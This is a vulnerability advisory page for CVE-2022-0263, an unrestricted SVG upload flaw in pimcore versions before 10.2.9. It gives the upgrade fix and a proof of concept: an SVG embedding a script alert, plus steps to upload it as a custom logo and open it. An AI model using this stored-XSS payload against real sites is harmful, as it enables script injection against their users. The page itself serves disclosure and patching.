Arbitrary File Upload Affecting pimcore/pimcore package, versions <10.2.9
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (19th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-PIMCOREPIMCORE-2343464
- published 19 Jan 2022
- disclosed 19 Jan 2022
- credit Pocas
Introduced: 19 Jan 2022
CVE-2022-0263 Open this link in a new tabHow to fix?
Upgrade pimcore/pimcore to version 10.2.9 or higher.
Overview
pimcore/pimcore is a content & product management framework (CMS/PIM/E-Commerce).
Affected versions of this package are vulnerable to Arbitrary File Upload. Due to missing validation, it is possible to upload an infinite number of dangerous SVG files in Settings => System Settings => Appearance and Branding of the "pimcore" service.
PoC:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script>alert(document.domain)</script>
</svg>
- Open the https://10.x-dev.pimcore.fun/admin/login?perspective=
- After login, Go to "Settings" => "System Setting" => "Appearance & Branding"
- Upload a SVG file using the Custom Logo Logic
- Open the URL of SVG file
References
CVSS Scores
version 3.1